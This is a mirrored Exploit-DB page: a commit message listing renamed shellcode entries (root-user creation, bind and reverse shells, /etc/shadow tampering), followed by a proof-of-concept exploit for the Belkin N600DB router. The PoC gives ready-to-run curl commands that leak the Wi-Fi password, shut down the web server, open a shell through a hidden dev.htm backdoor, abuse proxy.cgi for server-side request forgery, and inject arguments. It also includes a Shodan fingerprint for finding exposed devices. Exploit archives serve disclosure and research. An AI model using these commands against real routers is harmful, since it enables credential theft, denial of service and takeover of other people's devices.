bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/43682.txt
Offensive Security 1db36d5e8b DB: 2018-01-18 
76 changes to exploits/shellcodes

Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion
Microsoft Edge Chakra - Incorrect Scope Handling
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Microsoft Edge Chakra JIT - Out-of-Bounds Write
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
Transmission - RPC DNS Rebinding
Master IP CAM 01 - Multiple Vulnerabilities
Zomato Clone Script - Arbitrary File Upload
Reservo Image Hosting Script 1.5 - Cross-Site Scripting
D-Link DSL-2640R - Unauthenticated DNS Change
Belkin N600DB Wireless Router - Multiple Vulnerabilities
SugarCRM 3.5.1 - Cross-Site Scripting

Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)

Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)

Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)
Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)

Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes)

Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)
Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)

Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)

Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)

Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)
Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)

Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)

Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)

Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)

Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)

Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)

Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)

Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)

Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)
Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)
Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)

FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)

Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)
Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode

Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)
Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)

Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)

Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)
Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)
Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)
Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)
Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)
Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)
Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)
Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)
Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)
Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)
Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - CDRom Ejecting Shellcode (46 bytes)
Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)
Linux/x86 - exit(0) Shellcode (8 bytes)
Linux/x86 - sync Shellcode (6 bytes)
Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)
Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)
Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)
Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)
Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)
Linux/x86 - setreuid() + /sbin/iptables -F + exit(0) Shellcode (76 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)
Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)
Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)
Linux/x86 - iptables --flush Shellcode (43 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)
Linux/x86 - Force Reboot Shellcode (36 bytes)
Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
2018-01-18 05:02:25 +00:00

55 lines
No EOL
2.4 KiB
Text
Raw Blame History

# Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities
# Date: 16/01/2018
# Exploit Author: Wadeek
# Hardware Version: F9K1102as v3
# Firmware Version: 3.04.11
# Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
# Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin
== Wireless Fingerprinting ==
#===========================================
:ESSID: "belkin.XXX"
:Mode: Master
:Encryption key WPA2 Version 1 CCMP PSK: on
:Wireless Password/PIN: 8-alphanumeric
:DHCP: enable (192.168.2.1)
:MAC Address: 58:EF:68
#===========================================
== Web Fingerprinting (With Locked Web Interface) ==
#===========================================
:www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
#===========================================
:Device images:
/images/troubleshooting/checkWires.png (600x270)
/images/troubleshooting/startModem.png (600x270)
/images/troubleshooting/stopModem.png (600x270)
/images/troubleshooting/restartRouter.png (600x270)
#===========================================
:Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js
#===========================================
== PoC ==
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Disclore wifi password:
curl --silent "http://192.168.2.1/langchg.cgi"
||
curl --silent "http://192.168.2.1/adv_wifidef.cgi"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Closed "HTTPD server" port:
curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Web Backdoor:
http://192.168.2.1/dev.htm
> ?
> sh
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Server-Side Request Forgery (HTTP/FTP):
{45.33.32.156 == scanme.nmap.org}
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
||
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Command Injection:
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Reference in a new issue View git blame Copy permalink